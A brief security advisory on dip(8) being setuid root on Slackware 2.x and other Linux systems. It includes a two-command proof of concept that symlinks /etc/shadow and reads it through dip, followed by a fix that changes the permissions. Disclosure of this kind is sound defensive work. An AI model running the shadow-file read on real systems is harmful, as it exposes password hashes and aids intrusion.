COMMAND

    dip(8)

SYSTEMS AFFECTED

    Slackware 2.0, 2.1, 2.2, 2.3. Other Linux systems.

PROBLEM

    dip(8) is installed setuid  root and world executable  by default.
    This allows a user to read any file on the system.

	$ ln -s /etc/shadow /tmp/dummy.dip
	$ /sbin/dip -v /tmp/dummy.dip
	[ Shadow password file and some garbage ]

SOLUTION

    Turn off the setuid  bit. Change the group  to modem and chmod  to
    2110. Then chgrp all your  /dev/ttyS* and /dev/cua* file to  modem
    and chmod them all to 660. You  may need to do the same with  your
    getty, pppd, and dialout programs.